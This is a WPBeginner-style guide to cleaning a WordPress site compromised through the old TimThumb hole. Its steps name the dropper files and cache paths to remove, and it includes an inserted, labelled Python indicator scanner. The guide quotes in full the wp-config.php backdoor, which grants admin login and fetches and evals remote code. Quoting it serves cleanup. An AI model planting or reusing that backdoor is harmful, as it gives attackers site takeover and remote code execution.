
How to Fix and Cleanup the TimThumb Hack in WordPress


If you remember correctly, there was a security issue with the TimThumb script in August, and it was fixed. To our surprise, however, many sites are still running the old version. We have fixed three sites in the past month, one of them yesterday, so it makes sense to write a step-by-step article that our users can simply follow. None of the three site owners we helped even knew what TimThumb was, or whether they were using it.

TimThumb is a PHP script that resizes images. It had a vulnerability, but the patched version is SAFE to use now.

So how do you know whether your site has been hacked? One sign is a big red warning screen in your browser when you visit your site:

Something's not Right Here

Another sign is a flood of emails from users reporting that they were redirected away from your site. In either case, most likely your site was a victim of this exploit.

As a precautionary measure, everyone should run the TimThumb Vulnerability Scanner plugin. It tells you whether you are using an older version of TimThumb. Many theme clubs upgraded their core right away, so this plugin checks whether the new, secure version of TimThumb or an older one is installed.

If your site has already fallen prey to this TimThumb exploit, here is what you need to do.

First, delete the following files:

/wp-admin/upd.php
/wp-content/upd.php

Log into the WordPress admin panel and reinstall your current WordPress version. The goal is to replace these files with clean copies:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/l10n.js

Then open your wp-config.php. Towards the bottom you will most likely find this large block of malware code, which harvests login credentials and cookies:

if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
        if ($_GET['pingnow'] == 'login') {
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0, 100)) . '.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}

In your theme's folder, look for anywhere the TimThumb script may be storing cached files. They are usually in one of these locations:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Delete every file that looks like this. If you are not sure, delete everything in the cache directory that is not an image file.

Next, replace timthumb.php with the latest version, which can be found at http://timthumb.googlecode.com/svn/trunk/timthumb.php
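As an added example (not part of the original article, and not the scanner plugin it mentions), here is a small Python script that checks a WordPress install for the indicators described in the steps above: the two upd.php dropper files, the backdoor's signature strings in wp-config.php, PHP files planted in TimThumb cache directories, and copies of timthumb.php whose VERSION constant is outdated. The minimum version (2.0), the theme names and every file's contents in the sample tree are assumptions constructed for the example; the script only reports and never deletes anything.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators taken from the clean-up steps: the dropper files, the naming
# pattern of payloads planted in TimThumb cache directories, and strings
# from the backdoor that gets appended to wp-config.php.
DROPPER_FILES = ("wp-admin/upd.php", "wp-content/upd.php")
CACHE_PHP_RE = re.compile(r"^external_[0-9a-f]{32}\.php$", re.IGNORECASE)
BACKDOOR_MARKERS = ("$_GET['pingnow']", "get_userdatabylogin", "eval($re)")
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")
# Assumption (not from the article): timthumb.php copies declaring a VERSION
# below this are reported as outdated. Set it to the release you verified.
MIN_TIMTHUMB_VERSION = (2, 0)


def parse_version(text):
    """Turn a dotted version string such as '2.8.14' into a comparable tuple."""
    parts = []
    for piece in text.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def timthumb_version(path):
    """Return the VERSION constant declared in a timthumb.php copy, or None."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return None
    match = VERSION_RE.search(text)
    return match.group(1) if match else None


def scan_site(root):
    """Walk a WordPress install; return sorted (indicator, relative path) pairs."""
    root = Path(root)
    findings = []
    # 1. Dropper files named in the first clean-up step.
    for rel in DROPPER_FILES:
        if (root / rel).is_file():
            findings.append(("dropper_file", rel))
    # 2. wp-config.php carrying the injected auto-login / remote-code block.
    config = root / "wp-config.php"
    if config.is_file():
        text = config.read_text(errors="replace")
        if all(marker in text for marker in BACKDOOR_MARKERS):
            findings.append(("wp_config_backdoor", "wp-config.php"))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = (Path(dirpath) / name).relative_to(root).as_posix()
            # 3. PHP inside a "cache" directory: external_<md5>.php is the
            #    known payload name; any other .php file there is suspect too.
            if Path(dirpath).name == "cache":
                if CACHE_PHP_RE.match(name):
                    findings.append(("cache_php_payload", rel))
                elif name.lower().endswith(".php"):
                    findings.append(("cache_php_other", rel))
            # 4. Outdated or version-less timthumb.php copies. Themes that
            #    renamed the script need that name added to this check.
            if name.lower() == "timthumb.php":
                version = timthumb_version(Path(dirpath) / name)
                if version is None or parse_version(version) < MIN_TIMTHUMB_VERSION:
                    findings.append(("old_timthumb", f"{rel} (VERSION={version})"))
    return sorted(findings)


def build_sample_site(root):
    """Write a small, constructed WordPress tree that exhibits each indicator."""
    root = Path(root)
    files = {
        "wp-admin/upd.php": "<?php // constructed sample dropper\n",
        # constructed wp-config.php holding only the backdoor's signature strings
        "wp-config.php": "<?php\ndefine('DB_NAME', 'example_db');\n"
                         "if (isset($_GET['pingnow']) && isset($_GET['pass'])) {\n"
                         "    $user = get_userdatabylogin('admin');\n    eval($re);\n}\n",
        "wp-content/themes/demo/scripts/cache/external_d41d8cd98f00b204e9800998ecf8427e.php": "<?php\n",
        "wp-content/themes/demo/scripts/cache/photo.jpg": "constructed, not a real image",
        "wp-content/themes/demo/scripts/timthumb.php": "<?php\ndefine ('VERSION', '1.32');\n",
        "wp-content/themes/clean/timthumb.php": "<?php\ndefine ('VERSION', '2.8.14');\n",
    }
    for rel, content in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_site(tmp)


if __name__ == "__main__":
    for indicator, path in demo():
        print(f"{indicator:20} {path}")
```

Run it against a real install with scan_site("/path/to/wordpress"); the sample tree exists only so the script can be exercised offline. Reinstalled core files (the step above) are not covered here, since verifying them requires known-good checksums for your exact WordPress version.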

Now it is a good idea to change your passwords, starting with your MySQL login and then your WordPress logins. Don't forget to update the MySQL password in wp-config.php as well, or you will get the "Error Establishing Connection" screen.

Change the secret keys in your wp-config.php file. You can generate new ones with the online generator.

Now you are done. Don't forget to empty all page-caching plugins. As a further precaution, clear your browser's cache and cookies as well.

For developers: consider using the built-in Additional Image Sizes feature in WordPress to replace TimThumb's functionality.

Let us know if you need further assistance by using our contact form.


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.


Comments

  1. MichealKennedy says:

    Would have been useful a week ago BEFORE I got hacked! >:| Lol. But thanks!

  2. doulce says:

    The best way to fix TimThumb is to remove it completely. Anyway, TimThumb is not the best way to resize images. You can use the built-in functionality from WordPress, add_image_size, plus a plugin called Thumbnail Regenerate. So simple.
